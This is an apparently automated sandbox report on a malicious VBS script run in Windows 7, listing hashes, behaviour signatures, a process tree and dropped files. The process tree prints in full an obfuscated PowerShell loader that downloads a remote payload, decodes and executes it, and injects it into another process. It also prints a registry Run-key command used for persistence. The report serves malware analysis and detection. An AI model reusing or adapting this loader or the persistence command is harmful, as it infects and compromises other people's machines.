Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
  • submitted
    21-05-2024 14:59

General

  • Target

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs

  • Size

    13KB

  • MD5

    12e0264eaf14daca0cd45da32ea68c80

  • SHA1

    56774e10d374a80549d06406f52514c06634c5e4

  • SHA256

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66

  • SHA512

    8d80725c889c722be19dd07bda6c8ed29d2a2d5cd8f353eb5df7f4f998538c7ca8afd08993800c7cdb2772f6b5c51e78399c51e486c19fafa29f963acdc6b66e

  • SSDEEP

    192:6i9I38fdqWxBTsQqkqYK2yud66mT7LdjnPm4oTgWXvA/YJgzyv3tEQpK:1I3IddsMqYK2ndc1jO4cgZ/+GyPtLK

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:1208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. 
Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. 
';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. 
SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP 
FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. 
Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
        3⤵
          PID:1416
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. 
Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. 
';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. 
SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP 
FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. 
Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:596
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
            4⤵
              PID:516
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2468
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1348
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2872

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Roaming\Droh.Lit

        Filesize

        480KB

        MD5

        1a958060ba3e3de4653959fe2fd1efd5

        SHA1

        c5d3a5646dc5920668f1f61c334c7c7d40c888b5

        SHA256

        268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab

        SHA512

        8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FNPSN90E19EQJP9QN7PC.temp

        Filesize

        7KB

        MD5

        bc28d4197085ba776631dfb6b5a2a087

        SHA1

        e0949021a788b0fc103a4862ba9eb37f710d84f1

        SHA256

        03f800e75edc2a12cf107debf20d86f1dc67b7d244ff94656f13a96415f9ff50

        SHA512

        225a7583ca4bb8214cb9a5fe8cdab943d8eedcf480aa9c8d669fb9fe975d4e214163d7ac9f659ea25f22fe31d22d7d4dc8d58f9e75a7d6e92f13ef08bf104659

      • memory/596-19-0x0000000006330000-0x0000000008BF9000-memory.dmp

        Filesize

        40.8MB

      • memory/2360-7-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-8-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-9-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-10-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-11-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-4-0x000007FEF67EE000-0x000007FEF67EF000-memory.dmp

        Filesize

        4KB

      • memory/2360-5-0x000000001B270000-0x000000001B552000-memory.dmp

        Filesize

        2.9MB

      • memory/2360-17-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-18-0x000007FEF67EE000-0x000007FEF67EF000-memory.dmp

        Filesize

        4KB

      • memory/2360-6-0x0000000002320000-0x0000000002328000-memory.dmp

        Filesize

        32KB

      • memory/2360-27-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2468-22-0x0000000000F30000-0x0000000001F92000-memory.dmp

        Filesize

        16.4MB